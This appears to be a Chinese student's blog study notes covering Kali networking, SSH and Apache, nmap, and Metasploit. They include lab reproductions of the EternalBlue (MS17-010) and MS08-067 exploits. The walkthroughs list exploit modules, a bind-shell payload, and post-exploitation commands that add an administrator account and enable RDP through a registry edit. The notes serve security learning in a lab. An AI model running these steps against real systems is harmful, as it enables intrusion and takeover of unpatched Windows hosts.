Kali的相关学习、永恒之蓝漏洞(MS17-010)、ms12-020漏洞(蓝屏攻击)

学习任务

熟悉kali网络配置,nat模式和桥接模式

熟悉nmap使用

熟悉msfconsole使用

熟练掌握如何利用ms17-010,ms08_067

kali网络配置

资料:07-网络安全-kail linux 网络配置(基础篇) - Jaoany - 博客园 (cnblogs.com)

1.使用ifconfig查看kail网络连接情况,ip地址情况

2.还可以使用ping命令检测网络是否连通,在同一个网段下,(如192.168.1.xxx和192.168.1.xxy)时能互相访问的,如下就可以ping

如果使用NAT模式连接,相当于是模拟的IP地址,虚拟网卡,也能够ping通,和访问外网。

(当没有网络时,可以手动进行配置NAT连接)

常用网络服务ssh

资料:什么是SSH?SSH是如何工作的? - 华为 (huawei.com)

SSH(Secure Shell,安全外壳)是一种网络安全协议,通过加密和认证机制实现安全的访问和文件传输等业务。传统远程登录和文件传输方式,例如Telnet、FTP,使用明文传输数据,存在很多的安全隐患。随着人们对网络安全的重视,这些方式已经慢慢不被接受。SSH协议通过对网络数据进行加密和验证,在不安全的网络环境中提供了安全的网络服务。作为Telnet和其他不安全远程shell协议的安全替代方案,目前SSH协议已经被全世界广泛使用,大多数设备都支持SSH功能。默认情况下,SSH服务器使用端口号22。

通过编辑`/etc/ssh/sshd_config`文件启用PermitRootLogin和PasswordAuthentication,然后重启SSH服务,可以在KaliLinux上配置SSH。此外,MobaXterm等工具可用于安全连接到SSH服务器。

Kali中ssh的配置

1.配置kali ssh文件

2.修改配置文件

sudo nano /etc/ssh/sshd_config

3.启动SSH服务

不知道为什么一直在报错,解决不了

putty远程连接 

putty远程链接linux(保姆教程)_putty远程连接linux-CSDN博客

 常用网络服务apache

资料:Linux Apache服务详解——Apache服务基础知识_学习linux apache服务总结-CSDN博客

Apache HTTP Server(简称Apache)是Apache软件基金会的一个开放源码的网页服务器,可以在大多数计算机操作系统中运行,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩展,将Perl/Python等解释器编译到服务器中。 

Apache是一种网站服务程序,所谓网站服务程序,就是作为服务端,处理其他用户客户端发起的http或者https的请求,并给予响应的程序。目前,能够作为网站服务器的程序除了Apache之外还有Nginx、IIS等。
其中,IIS是微软推出的,专门用于windows平台的网站服务程序。Apache和Nginx则是Linux和Windows平台都可以使用。我们常说的LAMP和LNMP架构,其中的A和N就是指的Apache和Nginx。Apache和Nginx相对比,Apache代码量大,算法复杂,属于重量级服务器;Nginx则属于轻量级服务器,代码量少,相对不稳定。

 1.apache服务的开启

2.查看apache的运行状态

3.在主机浏览器访问kali ip页面 看是否成功开启

4.浏览器输入kali ip 进行查看 发现成功开启

5.修改apache服务端口 因为apache默认使用80端口,可以使用sudo nano /etc/apache2/apache2.conf修改端口

Nat模式、桥接模式、仅主机模式

资料:

VMware虚拟机三种网络模式:桥接模式,NAT模式,仅主机模式_虚拟机桥接模式是什么意思-CSDN博客

桥接模式?NAT模式?深入原理,一文带你彻底搞清楚!-CSDN博客

桥接模式

桥接模式就是将主机网卡与虚拟的网卡利用虚拟网桥进行通信。类似于把物理主机虚拟为一个交换机,所有桥接设置的虚拟机连接到这个交换机的一个接口上,物理主机也同样插在这个交换机当中,所以所有桥接下的网卡与网卡都是交换模式的,相互可以访问而不干扰。在桥接模式下,虚拟机IP地址需要与主机在同一网段,如果需要联网,则网关与DNS需要与主机网卡一致。 

桥接模式下的所有虚拟机都是和主机是在同一网段的,可以把它们看成是"平等"的关系,这就会带来一些麻烦,比如192.168.1段下只有254个主机地址,所以桥接模式下虚拟机和物理的总数不能超过这个数字! 

Nat模式

在NAT模式中,主机网卡直接与虚拟NAT设备相连,然后虚拟NAT设备与虚拟DHCP服务器一起连接在虚拟交换机VMnet8上,这样就实现了虚拟机联网。VMware Network Adapter VMnet8网卡是为了实现主机与虚拟机之间的通信。

可见NAT模式下主机更像是虚拟机们的"路由器",通过VMnet8虚拟网卡为虚拟机分发地址。所以虚拟机和主机不再同一网段下,可以理解为主机是虚拟机的"上级",这也就是为什么桥接模式没有VMnet0这个虚拟网卡,因为桥接模式下的虚拟机和主机是"平等"的,共用同一个路由器

VMnet8网卡的作用仅仅是主机与虚拟机之间的通信,访问外网是不通过VMnet8网卡的!NAT模式下的虚拟机时通过真实主机的ip访问外网

仅主机模式

仅主机模式可有看成是NAT模式去除了虚拟NAT设备,然后使用VMware Network Adapter VMnet1虚拟网卡连接VMnet1虚拟交换机来与虚拟机通信的,Host-Only模式将虚拟机与外网隔开,使得虚拟机成为一个独立的系统,只与主机相互通讯。

nmap的使用

资料:nmap详细使用教程_nmap使用教程-CSDN博客

网络扫描神器:Nmap 保姆级教程(附链接)_虚拟机怎么安装nmap-CSDN博客

例子:

1.扫描指定IP地址(ping 扫描)

2.扫描指定IP地址

3.扫描主机的指定端口 nmap xxx.xxx.x.x -pxx

msfconsole使用

【工具使用】——Metasploit(MSF)使用详解(超详细)-CSDN博客

Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。

在MS17_010 漏洞的复现中会演示相关操作

ms17-010(永恒之蓝)

资料:永恒之蓝漏洞复现(ms17-010)-CSDN博客

漏洞介绍

永恒之蓝(ms17-010)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。存在漏洞的主机,只需要开放445端口即可被攻击,获取系统最高权限

 漏洞复现

接下来在msf中利用ms17-010漏洞来攻击系统,以熟悉msf工具的使用

复现环境

  • 攻击机:kali,192.168.91.128
  • 被攻击机:win7,192.168.91.131 关闭防火墙

 1.在kali中使用nmap扫描win7,发现445端口开放

2.在kali的终端中打开msfconsole

3.利用search功能搜索ms17-010 搜索到两个模块

扫描模块:auxiliary/admin/smb/ms17_010

攻击模块:exploit/windows/smb/ms17_010_eternalblue

4.使用 模块3 对目标主机进行扫描,我们可以利用options先看一下选项,RHOSTS为目标主机,利用set 命令设置,之后就可以run了。

5.我们发现存在,ms17-010,进行exp,使用模块0,并查看选项,设置RHOSTS,再run

6.得到靶机:shell,使用chcp 65001 解决乱码问题

7.到这里就成功利用了漏洞,可以发现进入了winows系统,下面就可以对靶机进行远程控制了

首先添加一个新用户hhh并将其设成管理员

创建新用户:net user hhh 123456 /add

设成管理员:net localgroup administrators hhh /add

8.利用netstat -ano查看3389端口是否开启,发现没有开启

9.REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f把3389端口打开 

10.打开之后输入rdesktop 192.168.140.129:3389

11.选择其他用户,输入刚刚的新用户及其密码

ms08_067

资料:Windows漏洞:MS08-067远程代码执行漏洞复现及深度防御 - 华为云开发者联盟 - 博客园 (cnblogs.com)

漏洞介绍

MS08-067漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成栈缓冲区内存错误,从而被利用实施远程代码执行。MS08-067,也被称为“Conficker”漏洞,是一个影响Windows系统的远程代码执行漏洞。该漏洞允许攻击者利用Microsoft的SMB协议中的漏洞,在目标系统上执行恶意代码。

漏洞原理

MS08-067漏洞是通过MSRPC over SMB通道调用Server程序中的NEtPathCanonicalize函数时触发的。NetPathCanonicalize函数在远程访问其他主机时,会调用NetpwPathCanonicalize函数,对远程访问的路径进行规范化,而在NetpwPathCanonicalize函数中发生了栈缓冲区内存错误(溢出),造成可被利用实施远程代码执行(Remote Code Execution)。后续部分我将分析该漏洞的CFG流程图及漏洞成因。

漏洞复现

首先要确保系统的445端口是开发的以及关闭了系统的防火墙,要保证该电脑系统存在此漏洞

1.首先进入msfconsole,寻找ms08-067相关的攻击模块。

2.这里只有一个可用的exploit模块,use它。

3.输入options

4.显示出可以被攻击的靶机的操作系统型号

5.set  target  5(Windows XP SP2 英文版 (NX))

 

6.配置options set rhosts 192.168.91.135

7.show payloads

8.set payload generic/shell_bind_tcp

9.show options

8.配置完毕 run/exploit 执行攻击

若有报错信息可尝试以下的方法:

 

9.在Windows上创建一个名称为mianmian密码为666的用户,并提升为管理员权限  net user mianmian 666 /add && net localgroup administrators mianmian /add 

10.开启windows远程登录端口

echo reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f > C:\WINDOWS\system32\3389.bat && call 3389.bat

11.检查3389端口是否打开

12.重新打开一个终端 进行远程登录

rdesktop 192.168.91.135:3389

13.成功登录

  • 21
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值